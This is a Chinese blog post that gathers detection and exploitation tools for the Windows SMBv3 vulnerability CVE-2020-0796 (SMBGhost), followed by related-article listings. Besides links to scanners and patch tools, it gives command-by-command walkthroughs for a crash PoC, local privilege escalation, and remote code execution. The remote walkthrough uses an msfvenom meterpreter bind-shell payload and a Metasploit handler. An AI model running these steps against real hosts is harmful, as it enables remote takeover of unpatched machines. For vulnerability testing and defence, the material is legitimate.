cve-2020-0796_CVE20200796 漏洞检测及利用工具

最新推荐文章于 2024-05-08 17:40:54 发布
最新推荐文章于 2024-05-08 17:40:54 发布
阅读量419 收藏 1
点赞数
文章标签: cve-2020-0796 seay svn漏洞利用工具 weblogic漏洞利用工具

自2020年3月12日,微软正式发布CVE-2020-0796高危漏洞补丁后,时隔数月,远程利用PoC代码已经被公布,这也意味着这场漏洞风波即将告一段落了。

本文汇总了多个CVE-2020-0796 漏洞检测及利用工具,方便系统管理员对未修复漏洞的系统进行检测和防护。

漏洞检测篇

git 脚本检测:

https://github.com/ollypwn/SMBGhost

检测返回的数据包中SMB压缩版本,这种检测方式打过补丁依然会误报。

12b6a0b64edd3b433f419eaf57db49c1.png

奇安信检测工具:

http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

适用于局域网批量检测,快速查找未打补丁的机器。

e3a2058f100d542f3160f0912ee11bd9.png

腾讯电脑管家SMB漏洞修复工具:

http://dlied6.qq.com/invc/QQPatch/QuickFix_SMB0796.exe

适用于个人用户检测,一键快速检测和修复。

be45caa40594991f3bb01fbadee27150.png

漏洞利用篇

蓝屏PoC:

https://github.com/eerykitty/CVE-2020-0796-PoC

使用两台虚拟机作为漏洞演示,一台win10 1903版本,一台是Kali Linux。

git clone https://github.com/eerykitty/CVE-2020-0796-PoC.gitpython3 setup.py installpython3 CVE-2020-0796.py 192.168.172.128

4edaec4ad27b6500f502c633846d15a0.png

本地提权PoC:

https://github.com/danigargu/CVE-2020-0796

本地普通用户Bypass执行提权exp后弹出cmd窗口,成功获取system权限。

3fa16322dcc146a18696e56a7bfaddd4.png

远程利用PoC:

https://github.com/chompie1337/SMBGhost_RCE_PoC

漏洞演示过程:

1、使用msfvenom生成payload

msfvenom  -p windows/x64/meterpreter/bind_tcp  lport=1234 -f py -o evil.py

2、将evil.py 生成的code,替换到exploit.py的USER_PAYLOAD参数,并把参数buf改为USER_PAYLOAD。

root@kali:~# git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.gitroot@kali:~# cd SMBGhost_RCE_PoC/root@kali:~/SMBGhost_RCE_PoC# lsexploit.py  kernel_shellcode.asm  lznt1.py  __pycache__  README.md  smb_win.py

3、运行exploit.py

python3 exploit.py -ip 192.168.172.128

b9dedc7d14b19f9caa0bf95838d428ab.png

4、启动msf监听本地端口(PS:监听端口如果一直收不到shell,可重新运行一次。)

msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcppayload => windows/x64/meterpreter/bind_tcpmsf5 exploit(multi/handler) > set lport 1234lport => 1234msf5 exploit(multi/handler) > set rhost 192.168.172.128rhost => 192.168.172.128msf5 exploit(multi/handler) > exploit

f94147523b2707c2458ef0e4f34760e5.png

weixin_39667797
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2018-8120-exp.zip_C++_CVE-2018-8120_cve_漏洞利用
09-23
在提供的压缩包中,`CVE-2018-8120-exp`很可能是包含C++编写的具体漏洞利用代码。C++作为一种通用且性能强大的编程语言,常被用于编写这类低级别的系统攻击工具,因为它可以直接操作内存和系统调用。利用代码通常会...
5 款漏洞扫描工具:实用、强力、全面(含开源)
HUANGXIN9898的博客
09-14 3116
Trivy 是一个开源漏洞扫描程序,能够检测开源软件中的 CVE。这款工具针对风险提供了及时的解释,开发人员可自行决定是否在容器或应用程序中使用该组件。常规的容器安全协议使用的是静态镜像扫描来发现漏洞,Trivy 则是将漏洞扫描工具无缝合并到集成开发环境当中。另外,由于背靠庞大的开源社区,许多的集成及附加组件都支持 Trivy,例如使用 Helm 图表能够将 Trivy 安装到 Kubernetes 集群,借助 Prometheus 导出器能够提取漏洞指标。
CVE漏洞检索工具操作手册
weixin_44820552的博客
06-30 1141
这是一个用于查询组件CVE漏洞信息的Python脚本。它使用NIST NVD的RESTful API来获取CVE数据,并提供格式化的输出和导出到Excel功能。
【网络安全---漏洞复现】Tomcat CVE-2024-1938 漏洞复现和利用过程(特详细)
最新发布
2401_84264010的博客
05-08 1084
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
CVE-2023-27524 Apache Superset Auth Bypass|附检测工具
dust_hk的博客
05-08 844
简单来说session就是浏览器与服务器交互的门禁,通过session可以验证访问者的身份信息,大多数的session是保存在服务器端的,但是也有少部分保存在客户端的session,比如下面要说的flask框架。Apache Superset是基于python中的flask web框架编写的,flask是一个python轻量级web框架,它的session存储在客户端的cookie字段中。注:文章所涉及的技术内容仅供参考,利用本文所提供的信息造成的直接或间接后果和损失,均由使用者自行承担。
组件漏洞_扫描检测工具
weixin_42786460的博客
09-10 608
组件漏洞_扫描检测工具
CVE-2022-0543 Redis Lua 沙盒逃逸 RCE | 附检测工具
dust_hk的博客
03-21 4540
CVE-2022-0543 Redis Lua 沙盒逃逸 RCE 摘要 Redis是一种非常广泛使用的缓存服务,但它也被用作消息代理。客户端通过套接字与 Redis 服务器通信,发送命令,服务器更改其状态(即其内存结构)以响应此类命令。Redis 嵌入了 Lua 编程语言作为其脚本引擎,可通过eval命令使用。Lua 引擎应该是沙盒化的,即客户端可以与 Lua 中的 Redis API 交互,但不能在运行 Redis 的机器上执行任意代码。Debian以及Ubuntu发行版的源在打包Redis时...
CVE-2020-1938 漏洞利用工具(POC)
09-12
CVE-2020-1938漏洞详解】 CVE-2020-1938,也被称为Apache Tomcat文件包含漏洞,是一个在Apache Tomcat服务器中发现的安全漏洞,该漏洞允许攻击者远程读取服务器上的任意文件,甚至可能在某些情况下执行恶意代码。...
CVE-2018-9995_dvr_credentials.rar_CVE-2018_FXG_burp CVE-2018-999
09-20
综上所述,这个压缩包提供的工具可能是一个安全研究人员或渗透测试人员用来检测利用CVE-2018-9995漏洞的实用程序。用户可以使用它来发现和获取那些由于此漏洞而暴露的DVR设备的凭证,同时结合Shodan来扩大搜索范围...
CVE-2015-7857 Joomla注入漏洞利用工具
04-18
**利用工具分析** "Joomla漏洞利用.exe" 文件可能是用于测试系统是否存在CVE-2015-7857漏洞工具。这类工具通常由安全研究人员或渗透测试人员使用,以评估网站的安全性。然而,恶意用户也可能滥用这类工具进行非法...
CVE-2020-0796 POC EXP.zip
04-01
标题中的"CVE-2020-0796 POC EXP.zip"是一个与网络安全相关的压缩包文件,其中包含了针对CVE-2020-0796漏洞的Proof-of-Concept (PoC) 检测代码以及本地Exploit(exploit)执行代码。这些代码通常用于验证漏洞的存在...
cve-check-tool, 原始自动CVE检查工具.zip
09-18
cve-check-tool, 原始自动CVE检查工具 cve-check-tool cve-check-tool,顾名思义,是一种检查已知( public ) 大小的工具工具将通过版本匹配识别Linux发行版中潜在的vunlnerable软件包。 如果可以能的话,它也会寻找(
weblogicCVE-2018-2628批量检测工具
05-08
weblogic-CVE-2018-2628-反序列化漏洞批量验证脚本。优化多线程检测。具备漏洞发现功能。
SMB-2
H2SO2的专栏
05-14 1329
Samba服务工作原理Samba服务工作原理Samba服务的具体工作过程如图所示。① 首先客户端发送一个SMB negprot请求数据报,并列出它所支持的所有SMB协议版本。服务器收到请求信息后响应请求,并列出希望使用的协议版本。如果没有可使用的协议版本则返回0XFFFFH,结束通信。② 协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SesssetupX请求
idea2020shezhi代码检查级别_Windows漏洞利用之SMBv3服务远程代码执行漏洞(CVE20200796)复现及详解...
weixin_39593718的博客
11-20 435
一.漏洞描述基本描述:2020年3月11日,某国外安全公司发布了一个近期微软安全补丁包所涉及漏洞的综述,其中谈到了一个威胁等级被标记为Critical的SMB服务远程代码执行漏洞(CVE-2020-0796)。攻击者可能利用漏洞远程无需用户验证通过发送构造特殊的恶意数据导致在目标系统上执行恶意代码,从而获取机器的完全控制。微软SMBv3(Server Message Block 3.0...
CVE-2020-0796永恒之黑漏洞浅谈与利用
热门推荐
qq_39120795的博客
11-18 1万+
微软发布安全公告披露了一个最新的SMB远程代码执行漏洞(CVE-2020-0796),攻击者利用漏洞无须权限即可实现远程代码执行,一旦被成功利用,其危害不亚于永恒之蓝,全球 10 万台服务器或成首轮攻击目标。
SMB服务远程代码执行漏洞CVE-2020-0796)加固指南
乐大厨串串香飘万里
10-24 2975
1SMB服务远程代码执行漏洞CVE-2020-0796)高Windows。
漏洞复现_CVE-2020-0796 永恒之黑漏洞_遇坑_已解决
qq_51550750的博客
06-09 4809
永恒之黑漏洞复现
永恒之黑(CVE-2020-0796)漏洞验证
EnerY3的博客
12-13 991
CVE-2020-0796,也被称为“永恒之黑”,是一个严重的远程代码执行漏洞,影响了某些版本的Microsoft Windows操作系统。因此,此漏洞可能导致未经授权的远程访问和对受影响系统的完全控制。本文档中的信息不得用于未经授权的任何活动,包括但不限于未经授权的攻击行为。任何使用本文档中的信息进行未经授权的活动将违反法律,并可能导致法律后果。要保护你的系统不受这个漏洞的影响,你应该尽快安装适用于你系统版本的最新更新。请注意,本文档中的信息可能已过时,因为软件和系统可能已经修复了相关漏洞
关于工商银行美国分行被勒索攻击的事件分析
11-29
近日,工商银行美国子公司工银金融被勒索软件攻击,造成部分业务系统中断,美国国债市场的某些交易无法正常清算。微步情报局获悉该消息后,第一时间展开了针对该事件的分析,持续跟踪关于该事件的最新进展。目前关于该事件的初步分析结论如下结合公开信息并经过微步情报局分析,此次勒索事件背后攻击者疑似利用了最新 Citrixa漏洞 CVE-2023-4966 进行了攻击,攻击者利用漏洞可以泄露用户 Cookie 等敏感信息,最终被攻击者利用对内网进行横向移动 根据公开消息,此次事件的始作俑者疑似 Lockbit 勒索组织,该组织最早于 2019 年出现,经过多年的技术演进和模式升级,目前已经成为全球最为活跃的勒索组织之一。近期该组织攻击动作频发,美国波音公司、芯片巨头台积电等先后遭到该组织的勒索攻击影响较为严重。 微步情报局根据自身测绘数据的分析显示,此次攻击涉及工银金融多个业务系统,截至目前,相关受影响的业务系统仍然处于离线状态,仍未恢复

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值